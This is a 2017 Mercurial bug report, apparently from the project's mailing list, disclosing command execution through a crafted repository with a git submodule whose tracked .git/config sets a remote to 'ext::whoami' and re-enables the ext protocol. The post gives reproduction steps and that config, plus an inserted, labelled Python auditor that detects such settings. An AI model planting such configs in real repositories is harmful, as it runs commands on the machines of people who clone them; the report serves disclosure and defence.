[Bug 5730] New: [CRITICAL]Arbitrary command execution in mercurial repo with a git submodule
mercurial-bugs at mercurial-scm.org
Fri Nov 3 02:30:42 UTC 2017
https://bz.mercurial-scm.org/show_bug.cgi?id=5730
Bug ID: 5730
Summary: [CRITICAL] Arbitrary command execution in mercurial repo with a git submodule
Product: Mercurial
Version: stable branch
Hardware: All
OS: All
Status: UNCONFIRMED
Severity: bug
Priority: wish
Component: Mercurial
Assignee: bugzilla at mercurial-scm.org
Reporter: pnigos at live.com
CC: mercurial-devel at mercurial-scm.org
I found that using hg to track a crafted mercurial repo with a git submodule
can lead to command execution on the user's OS.
The root cause is that hg supports adding a git submodule to an hg repo, and so
I can use hg to track the .git directory and thus modify the git config file
from the remote. I use the ext helper protocol as a PoC. I can modify the git config
file to allow the ext helper protocol, which has been disallowed in the latest
version of git, and then when the victim does anything on the evil git submodule, the ext
protocol will be triggered and execute the OS command.
Here are the reproduction steps:
1. Create an hg repo;
2. Create a git repo and make a commit to it. (The commit is a must.)
3. Now let us use hg to make a crafted hg repo first.
4. Use hg to check out the hg repo and then add that git repo as its
submodule.
5. Modify ./hgrepo/gitsubmodule/.git/config to something like:
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    ignorecase = true
    precomposeunicode = true
[remote "pwn2own"]
    url = ext::whoami
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master
[protocol]
    allow = always
I modified two parts: changed the remote URL to "ext::whoami" and added a protocol
section to allow the ext protocol to be used.
Then commit all the above changes and push to the remote.
When another victim uses the hg command to clone that crafted repo and then
pulls, fetches, checks out, pushes, etc. in the git submodule, our command will be
executed. As we already control the git config file on the remote, there are lots of
options we can use to execute commands or do other things.
Mercurial accidentally overwrites the .git folder with the user-supplied .git folder during
hg cloning, which gives an attacker a chance to modify the config file and leads to
command execution.
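As an added defensive check, not part of the report or of Mercurial, the following Python audits every .git/config found under a checkout for the two changes the report describes: a remote whose URL uses the ext helper and a protocol section that re-enables it. The function and variable names and the sample config are my own, constructed to mirror the file quoted above.

```python
import os
import re

# [section] or [section "subsection"] header, as written in git config files
SECTION_RE = re.compile(r'^\[([^\s\]]+)(?:\s+"([^"]*)")?\]$')


def parse_git_config(text):
    """Minimal git-config parser: {(section, subsection): {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            current = (m.group(1).lower(), m.group(2))
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            sections[current][key.lower()] = value
    return sections


def audit_git_config(text):
    """Return findings for settings that let a fetch/push run a local command."""
    findings = []
    for (section, sub), keys in parse_git_config(text).items():
        url = keys.get("url", "")
        if section == "remote" and url.lower().startswith("ext::"):
            findings.append(f'remote "{sub}" uses the ext helper: {url}')
        # ext:: is off by default in current git; these settings turn it back on
        if section == "protocol" and sub in (None, "ext") \
                and keys.get("allow", "").lower() == "always":
            name = "protocol.allow" if sub is None else "protocol.ext.allow"
            findings.append(f"{name} = always re-enables the ext transport")
    return findings


def audit_tree(root):
    """Audit every .git/config under a checkout, submodules included."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        if os.path.basename(dirpath) == ".git" and "config" in files:
            path = os.path.join(dirpath, "config")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = audit_git_config(fh.read())
            if findings:
                results[path] = findings
    return results


# Constructed sample (not a real file) modelled on the config quoted in the report.
SAMPLE_CONFIG = ('[core]\n\tbare = false\n[remote "pwn2own"]\n\turl = ext::whoami\n'
                 '\tfetch = +refs/heads/*:refs/remotes/origin/*\n[protocol]\n\tallow = always\n')
```

Run `audit_tree(".")` inside a fresh clone before touching any submodule; a non-empty result means the working copy carried its own git configuration.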
I first reported this one to SourceTree, but later I found the root cause was
on the Mercurial side, so I decided to report it here as well.